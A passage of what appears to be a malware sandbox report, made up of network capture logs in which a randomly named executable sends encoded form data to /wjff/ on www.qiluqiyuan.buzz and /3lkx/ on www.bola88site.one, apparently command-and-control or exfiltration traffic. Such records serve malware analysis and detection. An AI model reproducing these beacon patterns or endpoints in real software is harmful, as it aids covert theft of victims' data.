OlTXe=1I9qNX7VLGDrRNCfyI8aD8HK+NN+SrewkoyE4LoNcyRNGlm0Drft0xG/tvNuOzbUAxpilwbMgFmYD1j9+NxADeYCGqt+G+Nh03+kxRufPBJ1ivjpnOW5fd15yIBGE4+nj8DgnsfoAmzjBDby6W3GJvwrBJ8CX9VPfnFUCxHjvV+ingtRkl/abjAZxANnQZtn8r7D/aAnOj70LLe2nBiyMO50rvpE7Odw9eATF4sbXno8k4pjahcc/tBubBnH1elZZmZDa5ieOAMtvp751sHe1htymGbvL2QmBbVwABlBEYe3bU/91usC7EYnoL3R4dfkxY/KbPCrvCHY9gdyByKMjX244TcOZuCRyS/vzTcpHPcKk38nolBilJfxhrVkwtx6QnZ3keHGunnBc4nC9lGAMNTDOdKZqmgAV5K/04u5RB2vC2Cm4390s4WsgzkkNXnf9IU9w1a2k30RcLmKA3zBj0b8foQtILF7Gg6rGIio4jzT8e57WKHU33Hx3wXxVOpCXBqLoE4QtfOdM3GDwn2DxF0NKZCTbBBsmZhfgOEWmyAbE6UquWPmJUHgYCe2OTZUv1SH2jJAhvVt1UUxjDX9zQBbjqL3GMj/jUT1xU8V21iyFI6SDCrJHjxYGtinwJxuLR6lySyq1FEe1xGHrjy5Kz+lfd7wqzVGvzjCNnoOIyBOHUXlhGK0FFPvbz/CsJGnIqhYEQTSZHXo++7cflIL9bTPs3ti+qAcXbJYYWxCAtB3S5vyLOuGZ6wnhNCB8IfwMTkzMHzIxa2dl2og1/oW0kog1Kya9XldTVL9dYKE8iO2ECfLmHjLoT6M2PaC+qyfA8wDoDMOwpNV4vmR7XaoHBvwbQPs9WzcEVQfbAeE62vtd2i6NIcQhV1fU17WBX9gtzRcU8eRyQBfc6ZSMdv3WAbwhSgEcmnHVNmM1BMfEenT9uJHOx+B5buOlWWRKLTll0tH4supCg8+KzLAAcdISZ1D6OefMmvYK2FfwpV9iZvPRh [TRUNCATED]
                                        Sep 11, 2024 10:10:43.578555107 CEST221OUTData Raw: 73 4c 5a 4d 4d 6f 4a 66 51 39 37 6c 46 36 41 62 61 72 35 52 2b 2f 7a 42 76 6a 33 35 44 78 57 41 4e 6a 48 43 4b 68 5a 74 7a 52 4b 59 36 6c 41 58 5a 41 58 6c 78 67 69 6d 6f 52 55 54 53 58 43 6f 38 71 47 2b 74 4d 61 71 39 5a 50 41 37 65 63 30 59 37
                                        Data Ascii: sLZMMoJfQ97lF6Abar5R+/zBvj35DxWANjHCKhZtzRKY6lAXZAXlxgimoRUTSXCo8qG+tMaq9ZPA7ec0Y7INHuC10Uj1Us1e0DvvuJimlWxDAVMz3T5fi1QLJuVDUaH1RMtGIRzTyi58Fbn8l4Sv/X2Tw9I35gFQxY8pg2r6OMe2zPgTGnYE1JZq1CrmGAM9e17dyFsVkE7VzpfCcCWd94rQgi69o
                                        Sep 11, 2024 10:10:44.186044931 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:10:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: W/"66cd104a-b96"
                                        Content-Encoding: gzip
                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                        Sep 11, 2024 10:10:44.186069012 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.2249184161.97.168.245801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:46.112723112 CEST732OUTPOST /wjff/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.qiluqiyuan.buzz
                                        Origin: http://www.qiluqiyuan.buzz
                                        Referer: http://www.qiluqiyuan.buzz/wjff/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 52 4d 43 66 79 5a 38 61 44 63 48 4b 35 4e 4e 2b 46 37 65 32 6b 70 4f 6d 34 4c 42 49 66 42 78 4e 47 33 4f 30 43 65 7a 74 35 52 47 38 6d 50 4e 71 44 54 62 46 41 78 70 59 6c 79 2f 4d 67 45 43 59 43 51 6e 39 75 35 74 50 46 65 59 45 4f 4b 74 2f 47 2b 77 56 30 33 43 30 78 51 57 66 50 44 74 31 77 2f 7a 70 33 39 2b 35 61 74 31 6a 30 49 42 52 45 34 36 49 6a 38 54 34 6e 74 7a 6f 41 53 7a 6a 42 54 37 79 77 68 62 47 44 50 77 6f 47 4a 38 57 48 49 77 38 59 68 4e 44 48 7a 4f 4d 74 56 69 74 68 43 78 51 38 44 2f 71 54 57 30 4c 2b 47 34 58 59 59 42 71 72 51 3d 3d
                                        Data Ascii: OlTXe=1I9qNX7VLGDrRMCfyZ8aDcHK5NN+F7e2kpOm4LBIfBxNG3O0Cezt5RG8mPNqDTbFAxpYly/MgECYCQn9u5tPFeYEOKt/G+wV03C0xQWfPDt1w/zp39+5at1j0IBRE46Ij8T4ntzoASzjBT7ywhbGDPwoGJ8WHIw8YhNDHzOMtVithCxQ8D/qTW0L+G4XYYBqrQ==
                                        Sep 11, 2024 10:10:46.727677107 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:10:46 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: W/"66cd104a-b96"
                                        Content-Encoding: gzip
                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                        Sep 11, 2024 10:10:46.727799892 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.2249185161.97.168.245801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:48.656367064 CEST2472OUTPOST /wjff/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.qiluqiyuan.buzz
                                        Origin: http://www.qiluqiyuan.buzz
                                        Referer: http://www.qiluqiyuan.buzz/wjff/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 64 4e 47 6d 65 30 43 37 66 74 31 78 47 38 75 76 4e 75 4f 7a 62 58 41 31 42 79 6c 77 57 78 67 48 75 59 44 78 33 39 2b 4d 78 41 4f 4f 59 43 45 71 74 34 47 2b 78 58 30 7a 65 77 78 51 43 78 50 44 6c 31 7a 4d 62 70 6a 64 2b 34 51 4e 31 6a 30 49 42 64 45 34 37 62 6a 39 36 37 6e 73 37 34 41 6b 33 6a 42 7a 62 79 7a 47 33 48 55 2f 77 6b 46 4a 38 45 58 39 51 31 66 6e 46 49 43 78 53 2b 76 56 69 69 39 53 31 52 6b 69 54 56 43 54 41 61 31 41 4e 6e 65 35 74 6c 38 72 37 66 2f 61 41 6e 4f 69 33 30 4c 62 65 32 6e 45 43 78 43 75 35 30 6a 50 70 4a 30 75 51 4a 39 65 55 78 46 35 63 68 58 56 45 38 6c 36 78 6a 4c 42 63 63 33 39 42 6f 62 42 6e 41 73 75 6b 77 5a 6d 68 78 61 39 2b 30 4f 41 4d 74 76 71 7a 35 78 2b 66 65 38 52 74 79 2b 32 62 2f 41 57 51 70 42 62 42 65 41 46 6c 42 45 63 57 33 55 48 33 39 7a 74 45 42 31 55 59 36 73 4c 33 54 38 64 65 6b 78 59 6a 30 62 50 61 42 76 43 33 59 [TRUNCATED]
                                        Data Ascii: OlTXe=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczdNGme0C7ft1xG8uvNuOzbXA1BylwWxgHuYDx39+MxAOOYCEqt4G+xX0zewxQCxPDl1zMbpjd+4QN1j0IBdE47bj967ns74Ak3jBzbyzG3HU/wkFJ8EX9Q1fnFICxS+vVii9S1RkiTVCTAa1ANne5tl8r7f/aAnOi30Lbe2nECxCu50jPpJ0uQJ9eUxF5chXVE8l6xjLBcc39BobBnAsukwZmhxa9+0OAMtvqz5x+fe8Rty+2b/AWQpBbBeAFlBEcW3UH39ztEB1UY6sL3T8dekxYj0bPaBvC3Y9lxyCXmMgn2ngDc0O+GdyTqlzTYTHNoKim8nrnZh7Je00bUl0tx2QnsUkfnGvWfBd4HC5SyDO9TIKdLDkGhHV5e309yQQxGvDGCm/UF3z4Wp7DllE3mC9IVMw07DkHMRcL2KAlrBj0b9J4RmCrJFGgGvGIPt4ijT8uJ7WLHU93HxjgW5aupIXB+9oFAmuvqdMVeD2luDg101ZZCeVhB9mZxfgPwGmz4bEe4qv0rmB0HkSielOTZ+v1Wb2i1+hqFt1QAx2SX9pABYlqL7MsjljUayxVAz20qyGrySAzrJVTxWetinnZwrLRiTyQ2Q1EMe1AWHpDzvHT+kZd7/gTVyvzzCNnsOIz5OGjDllxe0JVPpfz+dipCHIqxyEVrCZFTosf7cWGtdyLTJp3sj0KAwXbJEYSVSBYV3VoPyNvuJR6wgrtCahYf6MT0VMCbYxpSdl24ggaEWoEog1Kyb9XlZTV3pdY6+8iO2ezfLmV7Lnz6J+vbe6qyRA801oDVrwoxV47qR7XanIRvzcQPv9W+8EVRVbASE7Ejtdj26Nq0Qm11fCF7Van9ltzQHU42ByRBfdK5SPbz0JAbxnShPWGaZVNqU1A4fEubT88xHPB+B57uJimW+Erehl3Z94uG5Cz0+LEvATflLH51Gl+edMmrRK2NXwpsGiavPfh [TRUNCATED]
                                        Sep 11, 2024 10:10:48.661351919 CEST1685OUTData Raw: 73 4b 70 4d 50 6b 5a 66 4e 30 62 6c 43 30 67 62 34 72 35 52 4d 2f 79 42 4a 6a 77 4a 44 32 41 63 4e 67 7a 75 4b 68 4a 74 71 48 36 59 58 76 51 62 48 41 58 35 74 67 67 2b 34 52 6d 4c 53 56 77 67 38 76 31 57 74 64 71 71 34 51 76 41 38 65 63 70 78 37
                                        Data Ascii: sKpMPkZfN0blC0gb4r5RM/yBJjwJD2AcNgzuKhJtqH6YXvQbHAX5tgg+4RmLSVwg8v1Wtdqq4QvA8ecpx7IcWuHROUSpUvle0VcXhNimjBBDNVMzfT5nu1RKMuUbUaFdRNdGLGTS5l58hbnh54SndX2Dw9Ir5glAxOMpgr76XSO2qCAXJnYFqOOSxJbSRbdFzwIQXU+B1b5FbgcaPK1dDut8lvtkrqPwWWMHpHirA88sILd3rii
                                        Sep 11, 2024 10:10:49.275805950 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:10:49 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: W/"66cd104a-b96"
                                        Content-Encoding: gzip
                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                        Sep 11, 2024 10:10:49.275854111 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.2249186161.97.168.245801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:51.193231106 CEST459OUTGET /wjff/?th=XXRlJ2&OlTXe=4KVKOjLTUXvpTd2tw+0OX+rMvdItGaiAiZnao6g9chZjOHWeMu7zgCrtm+9lJj39MntFpwW3ylu2DkTtyMRuAfMcELFFIudA3Xek0R/SN0pIlMTDq5r7ULEj7ewp HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.qiluqiyuan.buzz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:10:51.790452957 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:10:51 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 2966
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: "66cd104a-b96"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                        Sep 11, 2024 10:10:51.790471077 CEST224INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                                        Sep 11, 2024 10:10:51.790482044 CEST1236INData Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                                        Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                                        Sep 11, 2024 10:10:51.790493965 CEST224INData Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                                        Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s">
                                        Sep 11, 2024 10:10:51.790503025 CEST250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                        Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.2249187172.96.191.39801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:56.840490103 CEST2472OUTPOST /3lkx/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.bola88site.one
                                        Origin: http://www.bola88site.one
                                        Referer: http://www.bola88site.one/3lkx/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 4b 61 70 47 64 4a 61 4e 2f 50 4d 6e 6a 30 62 6c 47 4d 73 6f 7a 4c 56 75 37 42 77 45 2b 42 47 71 73 53 2b 47 47 42 41 6f 54 47 2b 53 50 4d 68 63 74 59 34 37 66 47 2b 51 4d 5a 32 2f 48 63 52 53 71 43 4e 42 75 48 39 73 4b 30 33 56 38 4b 61 2b 58 36 79 46 79 32 6f 77 38 2b 59 51 56 56 7a 38 68 54 4f 4f 70 65 49 73 68 33 34 2b 36 6a 77 33 70 42 73 50 66 64 68 58 4f 4f 71 2b 33 2f 59 78 47 75 47 73 68 70 79 51 30 6f 44 71 58 71 6c 62 6e 6c 74 64 56 4e 4a 4b 4f 5a 4b 75 57 65 62 46 70 34 32 43 7a 6c 58 6e 57 6d 30 74 44 41 43 2f 6e 74 44 61 4d 34 34 71 56 35 73 54 36 61 6a 66 75 7a 4f 38 33 39 6e 52 4d 69 6d 6b 41 65 4f 66 69 47 51 6d 31 31 38 42 4c 62 30 32 41 6c 4b 77 4e 51 6d 56 79 36 6b 4a 36 72 59 63 35 68 64 56 71 4e 62 63 6e 66 55 45 6c 58 51 6b 4a 31 54 74 49 32 67 79 51 43 64 67 44 72 7a 2b 30 72 46 